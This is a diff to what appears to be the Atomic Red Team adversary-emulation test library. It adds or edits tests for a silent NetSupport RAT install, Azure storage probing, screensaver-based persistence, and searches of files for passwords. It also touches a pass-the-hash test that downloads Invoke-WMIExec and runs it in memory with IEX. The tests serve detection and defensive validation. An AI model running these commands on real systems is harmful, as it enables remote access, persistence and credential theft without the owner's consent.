+      <DllExportPlatform Condition="'$(DllExportPlatform)' == ''">$(Platform)</DllExportPlatform>
+      <DllExportPlatformTarget Condition="'$(DllExportPlatformTarget)' == ''">$(PlatformTarget)</DllExportPlatformTarget>
+      <DllExportCpuType Condition="'$(DllExportCpuType)' == ''">$(CpuType)</DllExportCpuType>
+      <DllExportEmitDebugSymbols Condition="'$(DllExportEmitDebugSymbols)' == ''">$(DebugSymbols)</DllExportEmitDebugSymbols>
+      <DllExportLeaveIntermediateFiles Condition="'$(DllExportLeaveIntermediateFiles)' == ''">false</DllExportLeaveIntermediateFiles>
+      <DllExportTimeout Condition="'$(DllExportTimeout)' == ''">$(DllExportTimeout)</DllExportTimeout>
+      <DllExportKeyContainer Condition="'$(DllExportKeyContainer)' == ''">$(KeyContainerName)$(AssemblyKeyContainerName)</DllExportKeyContainer>
+      <DllExportKeyFile Condition="'$(DllExportKeyFile)' == ''">$(KeyOriginatorFile)</DllExportKeyFile>
+      <DllExportProjectDirectory Condition="'$(DllExportProjectDirectory)' == ''">$(MSBuildProjectDirectory)</DllExportProjectDirectory>
+      <DllExportInputFileName Condition="'$(DllExportInputFileName)' == ''">$(TargetPath)</DllExportInputFileName>
+      <DllExportFrameworkPath Condition="'$(DllExportFrameworkPath)' == ''">$(TargetedFrameworkDir);$(TargetFrameworkDirectory)</DllExportFrameworkPath>
+      <DllExportLibToolPath Condition="'$(DllExportLibToolPath)' == ''">$(DevEnvDir)\..\..\VC\bin</DllExportLibToolPath>
+      <DllExportLibToolDllPath Condition="'$(DllExportLibToolDllPath)' == ''">$(DevEnvDir)</DllExportLibToolDllPath>
+      <DllExportTargetFrameworkVersion Condition="'$(DllExportTargetFrameworkVersion)' == ''">$(TargetFrameworkVersion)</DllExportTargetFrameworkVersion>
+      <DllExportSdkPath Condition="'$(DllExportSdkPath)' == ''">$(TargetFrameworkSDKToolsDirectory)</DllExportSdkPath>
+      <DllExportSkipOnAnyCpu Condition="'$(DllExportSkipOnAnyCpu)' == ''">$(NoDllExportsForAnyCpu)</DllExportSkipOnAnyCpu>
+      <DllExportOrdinalsBase Condition="'$(DllExportOrdinalsBase)' == ''">1</DllExportOrdinalsBase>
+      <DllExportGenExpLib Condition="'$(DllExportGenExpLib)' == ''">false</DllExportGenExpLib>
+      <DllExportOurILAsmPath Condition="'$(DllExportOurILAsm)' != 'true'"></DllExportOurILAsmPath>
+    </PropertyGroup>
+
+    <DllExportAppDomainIsolatedTask 
+          Platform="$(DllExportPlatform)"
+          PlatformTarget="$(DllExportPlatformTarget)"
+          CpuType="$(DllExportCpuType)"
+          DllExportAttributeFullName="$(DllExportNamespace).$(DllExportMetaLibAttr)"
+          EmitDebugSymbols="$(DllExportEmitDebugSymbols)"
+          LeaveIntermediateFiles="$(DllExportLeaveIntermediateFiles)"
+          Timeout="$(DllExportTimeout)"
+          KeyContainer="$(DllExportKeyContainer)"
+          KeyFile="$(DllExportKeyFile)"
+          ProjectDirectory="$(DllExportProjectDirectory)"
+          InputFileName="$(DllExportInputFileName)"
+          FrameworkPath="$(DllExportFrameworkPath)"
+          LibToolPath="$(DllExportLibToolPath)"
+          LibToolDllPath="$(DllExportLibToolDllPath)"
+          TargetFrameworkVersion="$(DllExportTargetFrameworkVersion)"
+          SdkPath="$(DllExportSdkPath)"
+          SkipOnAnyCpu="$(DllExportSkipOnAnyCpu)"
+          OrdinalsBase="$(DllExportOrdinalsBase)"
+          GenExpLib="$(DllExportGenExpLib)"
+          OurILAsmPath="$(DllExportOurILAsmPath)"
+          MetaLib="$(DllExportMetaLibFullPath)"
+         />
+  
+  </Target>
+  <UsingTask TaskName="RGiesecke.DllExport.MSBuild.DllExportAppDomainIsolatedTask" AssemblyFile="RGiesecke.DllExport.MSBuild.dll" />
+
+  <Target Name="DllExportLib" BeforeTargets="PrepareForBuild;BeforeBuild;BeforeRebuild" >
+      <Exec Condition="!Exists('$(DllExportMetaLibFullPath).ddNSi')"
+              WorkingDirectory="$(DllExportRootPkg)$(DllExportToolsPath)"
+              Command="NSBin.bat &quot;$(DllExportMetaLibFullPath)&quot; &quot;$(DllExportNamespace)&quot; &quot;$(DllExportDDNSCecil)&quot;" />
+  </Target>
+  
+</Project>

atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/tools/nsbin.bat

@@ -0,0 +1,7 @@
+@echo off
+
+set dll=%1
+set namespace=%2
+set useCecil=%3
+
+powershell -NonInteractive -NoProfile -NoLogo -Command "& Import-Module \"%~dp0/NSBin.dll\"; Set-DDNS -Dll \"%dll%\" -Namespace \"%namespace%\" -UseCecil $%useCecil% "

atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/tools/powershell.bat

@@ -0,0 +1,24 @@
+@echo off
+
+for %%v in (3, 1, 2, 5, 4) do (
+    for /F "usebackq tokens=2* skip=2" %%a in (
+        `reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\%%v\PowerShellEngine" /v ApplicationBase 2^> nul`
+    ) do if exist %%b (
+        set powershell="%%b\powershell.exe"
+        goto found
+    )
+)
+
+echo PowerShell was not found. Trying call 'as is'
+powershell %*
+
+goto exit
+
+:found
+
+echo PowerShell path: %powershell% 
+
+%powershell% %*
+
+
+:exit

atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/tools/uninstall.ps1

@@ -0,0 +1,29 @@
+param($installPath, $toolsPath, $package, $project)
+
+$assemblyFName      = 'DllExport'
+$targetFileName     = 'net.r_eg.DllExport.targets'
+$metaLib            = $([System.IO.Path]::Combine("$installPath", 'lib\net20', $assemblyFName + '.dll'));
+$gpc                = Get-MBEGlobalProjectCollection
+$projects           = $gpc.GetLoadedProjects($project.FullName)
+
+# Configurator
+
+# $dllConf = Get-TempPathToConfiguratorIfNotLoaded 'net.r_eg.DllExport.Configurator.dll' "$toolsPath"
+# if($dllConf) {
+#     Import-Module $dllConf; 
+# }
+
+Import-Module (Load-Configurator "$toolsPath")
+Reset-Configuration -MetaLib "$metaLib" -InstallPath "$installPath" -ToolsPath "$toolsPath" -ProjectDTE $project -ProjectsMBE $gpc;
+
+#
+
+return $projects |  % {
+    $currentProject = $_
+
+    $currentProject.Xml.Imports | ? {
+        $targetFileName -ieq [System.IO.Path]::GetFileName($_.Project)
+    }  | % {  
+        $currentProject.Xml.RemoveChild($_)
+    }
+}

atomics/T1219/T1219.md

@@ -22,6 +22,8 @@ Admin tools such as TeamViewer have been used by several groups targeting instit
 
 - [Atomic Test #7 - RemotePC Software Execution](#atomic-test-7---remotepc-software-execution)
 
+- [Atomic Test #8 - NetSupport - RAT Execution](#atomic-test-8---netsupport---rat-execution)
+
 
 <br/>
 
@@ -311,4 +313,53 @@ Start-BitsTransfer -Source "https://static.remotepc.com/downloads/rpc/140422/Rem
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #8 - NetSupport - RAT Execution
+A recent trend by threat actors, once a foothold is established, maintain long term persistence using third party remote services such as NetSupport to provide the operator with access to the network using legitimate services.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** ecca999b-e0c8-40e8-8416-ad320b146a75
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| NetSupport_Path | Path to the NetSupport executable. | Path | $env:temp&#92;T1219Setup.exe|
+
+
+#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
+
+
+```powershell
+Start-Process #{NetSupport_Path} -ArgumentList "/S /v/qn"
+```
+
+#### Cleanup Commands:
+```powershell
+Stop-Process -Name "client32" -force -erroraction silentlycontinue
+```
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: NetSupport must be downloaded and exist on the disk at the specified location. (#{NetSupport_Path})
+##### Check Prereq Commands:
+```powershell
+if (Test-Path #{NetSupport_Path}) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+Start-BitsTransfer -Source "https://nsproducts.azureedge.net/nsm-1270/en/Setup.exe" -Destination "$env:temp\T1219Setup.exe" -dynamic
+```
+
+
+
+
 <br/>

atomics/T1219/T1219.yaml

@@ -150,3 +150,29 @@ atomic_tests:
       Stop-Process -Name "RPCService" -force -erroraction silentlycontinue
     name: powershell
     elevation_required: True
+- name: NetSupport - RAT Execution
+  auto_generated_guid: ecca999b-e0c8-40e8-8416-ad320b146a75
+  description: |
+    A recent trend by threat actors, once a foothold is established, maintain long term persistence using third party remote services such as NetSupport to provide the operator with access to the network using legitimate services. 
+  supported_platforms:
+  - windows
+  input_arguments:
+    NetSupport_Path:
+      description: Path to the NetSupport executable. 
+      type: Path
+      default: $env:temp\T1219Setup.exe
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+      NetSupport must be downloaded and exist on the disk at the specified location. (#{NetSupport_Path})
+    prereq_command: |
+      if (Test-Path #{NetSupport_Path}) {exit 0} else {exit 1}
+    get_prereq_command: |
+      Start-BitsTransfer -Source "https://nsproducts.azureedge.net/nsm-1270/en/Setup.exe" -Destination "$env:temp\T1219Setup.exe" -dynamic
+  executor:
+    command: |
+      Start-Process #{NetSupport_Path} -ArgumentList "/S /v/qn"
+    cleanup_command: | 
+      Stop-Process -Name "client32" -force -erroraction silentlycontinue
+    name: powershell
+    elevation_required: True

atomics/T1530/T1530.md

@@ -10,6 +10,8 @@ Misconfiguration by end users is a common problem. There have been numerous inci
 
 - [Atomic Test #1 - Azure - Enumerate Azure Blobs with MicroBurst](#atomic-test-1---azure---enumerate-azure-blobs-with-microburst)
 
+- [Atomic Test #2 - Azure - Scan for Anonymous Access to Azure Storage (Powershell)](#atomic-test-2---azure---scan-for-anonymous-access-to-azure-storage-powershell)
+
 
 <br/>
 
@@ -72,4 +74,54 @@ invoke-webrequest "https://raw.githubusercontent.com/NetSPI/MicroBurst/156c4e9f4
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #2 - Azure - Scan for Anonymous Access to Azure Storage (Powershell)
+Upon successful execution, this test will test for anonymous access to Azure storage containers by invoking a web request and outputting the results to a file. 
+The corresponding response could then be interpreted to determine whether or not the resource/container exists, as well as other information. 
+See https://ninocrudele.com/the-three-most-effective-and-dangerous-cyberattacks-to-azure-and-countermeasures-part-2-attack-the-azure-storage-service
+
+**Supported Platforms:** Iaas:azure
+
+
+**auto_generated_guid:** 146af1f1-b74e-4aa7-9895-505eb559b4b0
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| base_name | Azure storage account name to test | String | T1530Test2|
+| output_file | File to output results to | String | $env:temp&#92;T1530Test2.txt|
+| container_name | Container name to search for (optional) | String | |
+| blob_name | Blob name to search for (optional) | String | |
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+try{$response = invoke-webrequest "https://#{base_name}.blob.core.windows.net/#{container_name}/#{blob_name}" -method "GET"}
+catch [system.net.webexception]
+{if($_.Exception.Response -ne $null)
+{$Response = $_.Exception.Response.GetResponseStream()
+$ReadResponse = New-Object System.IO.StreamReader($Response)
+$ReadResponse.BaseStream.Position = 0
+$responseBody = $ReadResponse.ReadToEnd()}
+else {$responseBody = "The storage account could not be anonymously accessed."}}
+"Response received for #{base_name}.blob.core.windows.net/#{container_name}/#{blob_name}: $responsebody" | out-file -filepath #{output_file} -append
+```
+
+#### Cleanup Commands:
+```powershell
+remove-item #{output_file} -erroraction silentlycontinue
+```
+
+
+
+
+
 <br/>

atomics/T1530/T1530.yaml

@@ -42,3 +42,42 @@ atomic_tests:
     cleanup_command: |
       remove-item #{output_file} -erroraction silentlycontinue
     name: powershell
+- name: Azure - Scan for Anonymous Access to Azure Storage (Powershell)
+  auto_generated_guid: 146af1f1-b74e-4aa7-9895-505eb559b4b0
+  description: |
+    Upon successful execution, this test will test for anonymous access to Azure storage containers by invoking a web request and outputting the results to a file. 
+    The corresponding response could then be interpreted to determine whether or not the resource/container exists, as well as other information. 
+    See https://ninocrudele.com/the-three-most-effective-and-dangerous-cyberattacks-to-azure-and-countermeasures-part-2-attack-the-azure-storage-service     
+  supported_platforms:
+  - iaas:azure
+  input_arguments:
+    base_name:
+      description: Azure storage account name to test
+      type: String
+      default: T1530Test2
+    output_file:
+      description: File to output results to
+      type: String
+      default: $env:temp\T1530Test2.txt
+    container_name:
+      description: Container name to search for (optional)
+      type: String
+      default:
+    blob_name:
+      description: Blob name to search for (optional)
+      type: String
+      default:
+  executor:
+    command: |
+      try{$response = invoke-webrequest "https://#{base_name}.blob.core.windows.net/#{container_name}/#{blob_name}" -method "GET"}
+      catch [system.net.webexception]
+      {if($_.Exception.Response -ne $null)
+      {$Response = $_.Exception.Response.GetResponseStream()
+      $ReadResponse = New-Object System.IO.StreamReader($Response)
+      $ReadResponse.BaseStream.Position = 0
+      $responseBody = $ReadResponse.ReadToEnd()}
+      else {$responseBody = "The storage account could not be anonymously accessed."}}
+      "Response received for #{base_name}.blob.core.windows.net/#{container_name}/#{blob_name}: $responsebody" | out-file -filepath #{output_file} -append
+    cleanup_command: |
+      remove-item #{output_file} -erroraction silentlycontinue
+    name: powershell

atomics/T1546.002/T1546.002.md

@@ -40,6 +40,7 @@ This test copies a binary into the Windows System32 folder and sets it as the sc
 
 
 ```cmd
+reg export "HKEY_CURRENT_USER\Control Panel\Desktop" %userprofile%\backup.reg
 copy #{input_binary} "%SystemRoot%\System32\evilscreensaver.scr"
 reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaveActive /t REG_SZ /d 1 /f
 reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaveTimeout /t REG_SZ /d 60 /f
@@ -48,6 +49,12 @@ reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v SCRNSAVE.EXE /t REG_SZ
 shutdown /r /t 0
 ```
 
+#### Cleanup Commands:
+```cmd
+reg import %userprofile%\backup.reg
+del %userprofile%\backup.reg
+del %SystemRoot%\System32\evilscreensaver.scr
+```
 
 
 

atomics/T1546.002/T1546.002.yaml

@@ -14,11 +14,16 @@ atomic_tests:
       default: C:\Windows\System32\cmd.exe
   executor:
     command: |
+      reg export "HKEY_CURRENT_USER\Control Panel\Desktop" %userprofile%\backup.reg
       copy #{input_binary} "%SystemRoot%\System32\evilscreensaver.scr"
       reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaveActive /t REG_SZ /d 1 /f
       reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaveTimeout /t REG_SZ /d 60 /f
       reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaverIsSecure /t REG_SZ /d 0 /f
       reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v SCRNSAVE.EXE /t REG_SZ /d "%SystemRoot%\System32\evilscreensaver.scr" /f
       shutdown /r /t 0
+    cleanup_command: |
+      reg import %userprofile%\backup.reg
+      del %userprofile%\backup.reg
+      del %SystemRoot%\System32\evilscreensaver.scr
     name: command_prompt
     elevation_required: true

atomics/T1550.002/T1550.002.md

@@ -149,7 +149,7 @@ Note: must dump hashes first
 
 ```powershell
 [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
-IEX (IWR 'https://github.com/Kevin-Robertson/Invoke-TheHash/blob/01ee90f934313acc7d09560902443c18694ed0eb/Invoke-WMIExec.ps1' -UseBasicParsing);Invoke-WMIExec -Target #{target} -Username #{user_name} -Hash #{ntlm} -Command #{command}
+IEX (IWR 'https://raw.githubusercontent.com/Kevin-Robertson/Invoke-TheHash/01ee90f934313acc7d09560902443c18694ed0eb/Invoke-WMIExec.ps1' -UseBasicParsing);Invoke-WMIExec -Target #{target} -Username #{user_name} -Hash #{ntlm} -Command #{command}
 ```
 
 

atomics/T1550.002/T1550.002.yaml

@@ -110,5 +110,5 @@ atomic_tests:
   executor:
     command: |-
       [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
-      IEX (IWR 'https://github.com/Kevin-Robertson/Invoke-TheHash/blob/01ee90f934313acc7d09560902443c18694ed0eb/Invoke-WMIExec.ps1' -UseBasicParsing);Invoke-WMIExec -Target #{target} -Username #{user_name} -Hash #{ntlm} -Command #{command}
+      IEX (IWR 'https://raw.githubusercontent.com/Kevin-Robertson/Invoke-TheHash/01ee90f934313acc7d09560902443c18694ed0eb/Invoke-WMIExec.ps1' -UseBasicParsing);Invoke-WMIExec -Target #{target} -Username #{user_name} -Hash #{ntlm} -Command #{command}
     name: powershell

atomics/T1552.001/T1552.001.md

@@ -112,7 +112,7 @@ Extracting Credentials from Files. Upon execution, the contents of files that co
 
 ```powershell
 findstr /si pass *.xml *.doc *.txt *.xls
-ls -R | select-string -Pattern password
+ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
 ```
 
 

atomics/T1552.001/T1552.001.yaml

@@ -37,7 +37,7 @@ atomic_tests:
   executor:
     command: |
       findstr /si pass *.xml *.doc *.txt *.xls
-      ls -R | select-string -Pattern password
+      ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
     name: powershell
 - name: Access unattend.xml
   auto_generated_guid: 367d4004-5fc0-446d-823f-960c74ae52c3